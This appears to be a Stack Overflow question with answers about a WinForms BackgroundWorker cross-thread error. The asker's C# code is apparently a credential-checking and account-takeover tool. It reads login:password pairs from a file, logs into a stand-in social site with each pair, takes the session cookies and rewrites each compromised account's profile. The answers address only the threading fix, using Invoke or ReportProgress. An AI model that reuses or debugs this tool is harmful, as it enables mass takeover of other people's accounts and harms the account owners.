# BackgroundWorker Thread fails on access of a Windows Form control

Tags: c#, winforms, backgroundworker

I am trying to update a Windows Forms control from a background worker process, as shown in the code below. Unfortunately, I am getting the following error:

> Cross-thread operation not valid: Control 'richTextBox1' accessed from a thread other than the thread it was created on.

Here is the code I am using:

```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.IO;
using System.Text.RegularExpressions;

namespace WindowsFormsApplication1 {
    public partial class Form1 : Form {
        private CookieContainer cookies;
        public Form1() {
            InitializeComponent();
            backgroundWorker1.DoWork += 
                new DoWorkEventHandler(backgroundWorker1_DoWork);    
        }

        public string od_auth(string s) {    
            if (s.Contains(":")) {
                string[] acc = s.Split(':');
                cookies = new CookieContainer();
                HttpWebResponse res;
                try {
                    HttpWebRequest req = 
                        (HttpWebRequest)HttpWebRequest.Create(
                            "http://m.site.ru/dk?" + 
                            "bk=GuestMain" + 
                            "&st.cmd=main" + 
                            "&tkn=1110" +
                            "&fr.posted=set" +
                            "&fr.needCaptcha=" + 
                            "&fr.login=" + acc[0] + 
                            "&fr.password=" + acc[1] +
                            "&fr.remember=on" + 
                            "&button_login=%D0%92%D0%BE%D0%B9%D1%82%D0%B8"
                        );
                    req.AllowAutoRedirect = false;
                    req.Method = "HEAD";
                    req.CookieContainer = cookies;
                    req.UserAgent = "Opera/9.80 (Windows NT 6.1; U; ru) " +
                                    "Presto/2.2.15 Version/10.10";
                    req.ContentType = "application/x-www-form-urlencoded";
                    res = (HttpWebResponse)req.GetResponse();
                    res.Close();

                    string cook = "";
                    try {
                        if (res.Headers["Location"].Contains("cmd=userMain")) {    
                            cook = "AUTHCODE=" + Regex.Match(res.Headers["Set-Cookie"], @"HCODE=(?<id>[^;]+);").Groups["id"].Value + "; ";
                            cook += "JSESSIONID=" + Regex.Match(res.Headers["Set-Cookie"], @"ESSIONID=(?<id>[^;]+);", RegexOptions.RightToLeft).Groups["id"].Value + ";";
                            richTextBox1.Text += "[+] Авторизовались успешно на " + acc[0] + ":" + acc[1] + "\r\n";
                            return cook;
                        } else {
                            cook = "badacc";
                            richTextBox1.Text += "[-] Аккаунт " + acc[0] + ":" + acc[1] + " невалидный\r\n";
                            return cook;
                        }
                    } catch {
                        cook = "badacc";
                        richTextBox1.Text += "[-] Аккаунт " + acc[0] + ":" + acc[1] + " невалидный\r\n";
                        return cook;
                    }
                }
                catch { richTextBox1.Text += "[?] network error \r\n"; ;return "err"; }
            }

            richTextBox1.Text += "[?] some error \r\n";
            return "err";
        }

        public void od_info_changer(string cook) {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create("http://m.site.ru/dk?bk=UserSettingsProfile&st.cmd=userSettingsProfile&tkn=2154");
            request.Method = "POST";
            request.Headers.Add("Cookie: "+cook);
            request.AllowAutoRedirect = false;
            request.ContentType = "application/x-www-form-urlencoded";
            byte[] EncodedPostParams = Encoding.UTF8.GetBytes("fr.posted=set&fr.name=D1%8F&fr.surname=%D0&fr.gender=1&fr.birthday=12&fr.bmonth=10&fr.byear=1949&fr.country=10414533690&fr.city=%D0%95%D0%BA%D0%B0%D1%82%D0%B5%D1%80%D0%B8%D0%BD%D0%B1%D1%83%D1%80%D0%B3&button_save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C");
            request.ContentLength = EncodedPostParams.Length;
            request.GetRequestStream().Write(EncodedPostParams, 0, EncodedPostParams.Length);
            request.GetRequestStream().Close();

            HttpWebResponse response = (HttpWebResponse)request.GetResponse();
            string html = new StreamReader(response.GetResponseStream(), Encoding.UTF8).ReadToEnd();
            if (response.Headers["Location"].IndexOf("st.cmd=userSettings") != -1) {
                richTextBox1.Text += "[+] Cменили пароль\r\n";
            } else {
                richTextBox1.Text += "[-] Не смогли сменить имя\r\n";
            }               
        }

        List<string> accs=new List<string>();
        private void открытьАккаунтыToolStripMenuItem_Click(object sender, EventArgs e) {
            OpenFileDialog openFileDialog1 = new OpenFileDialog();
            openFileDialog1.Filter = "txt files (*.txt)|*.txt|All files (*.*)|*.*";
            if (openFileDialog1.ShowDialog() == DialogResult.OK) {
                accs.Clear();
                foreach (string s in File.ReadAllLines(openFileDialog1.FileName))
                    accs.Add(s);

                richTextBox1.Text += "[+] Загрузили " + accs.Count.ToString() + " аккаунтов\n";
            }
        }

        private void Auth_Click(object sender, EventArgs e) {
            Auth.Enabled = false; // На время расчета блокируем опасные кнопки
            backgroundWorker1.RunWorkerAsync();
        }    

        public void go() {
            foreach (string acc in accs) {
                string cook = od_auth(acc);
                if (cook!="badacc")
                    od_info_changer(cook);
            }    
        }

        private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e) {
            go();
        }
    }
}
```

However, after loading up the `.txt` file and pressing my button, I receive:

[image: this error message]

What's going wrong?

Comment: Hi there, welcome to StackOverflow. It's difficult to tell what you're asking here, so please consider revising your question to help people answer.

Answer (score 3):

You cannot update controls directly from a background thread.  You need to invoke back to the main thread and perform the action there:

```
delegate void updateDelegate(string val);

private void UpdateText(string updateVal)
{
    if (richTextBox1.InvokeRequired)
        richTextBox1.Invoke(new updateDelegate(UpdateText), updateVal);
    else
        richTextBox1.Text += updateVal;

}
```

Then in your background worker code, instead of setting `richTextBox1.text`, you can just call the `UpdateText` method.

```
UpdateText("Whatever Value you want");
```

Comment: He shouldn't be invoking, he should just have the UI code in the completed event.

Comment: Error 1 Cannot assign to 'UpdateText' because it is a 'method group' C:\\Visual Studio 2010\Projects\Oer\Form1.cs 31 13 Od info changer

Comment: @Servy The updates are in a loop, so he could build the string up in memory and assign it at the end in the completed event, but depending how long the loop takes, it might make the app feel unresponsive.

Comment: @user1867542 I added an example call to the answer.  I also modified the call to append the text as that is what you seem to be doing in your loop.

Comment: @JohnKoerner In that case you simply need to think of it as progress reporting; have each request call `ReportProgress` and update the UI there.  It's generally a bad idea to just interweave all of your business logic with UI interactions `Invoke`ing as needed.  It results in hard to read and maintain code.

Comment: @user1867542 [check this post out and mark both question and answer if it is helpful to you.](http://stackoverflow.com/a/1675636/1389394)

Answer (score 2):

You're trying to interact with UI Controls inside of the background task. You can't do that. You need to put the code that takes a while to run (in this case, the HTTP request) and doesn't interact with the UI in the `DoWork` handler and the code that displays the results in the `RunWorkerCompleted` event handler.  The completed event will always run in the UI thread, as will the progress changed event.

When you need to update the UI periodically from a background task it's usually to indicate progress changed.  In such cases you can subscribe to the relevant progress changed event and then pass the current progress to the background worker periodically via `ReportProgress`.

You can use `Invoke` on a UI control to marshal to the UI thread from within a background thread, but you should avoid doing so for the most part.  The entire reason for using a `BackgroundWorker` is so that it takes care of that for you.  Your job is simply to put the appropriate code in the appropriate event handlers.  If you need to use `Invoke` for a few odd edge cases, that's sometimes easier, but if you're using it a lot it's a sign that you're not properly utilizing the existing higher level abstractions.

Comment: Servy, Is there a way to retrieve messages from `App.Properties.Settings` and set as label text when using `ReportProgress`? If `App.Properties.Settings` strings can be retrieved via an index, that would have been pretty handy.

Answer (score 0):

You should use `Control.Invoke`, if you want work with your form from backgroundworker. [Here](http://msdn.microsoft.com/en-us/library/zyzhdc6b.aspx) are explanation and a few examples.

Answer (score 0):

You have to safe invoke:

```
if (richtextBox1.InvokeRequired)
{
 richtextBox1.Invoke(//Delegate);
}
```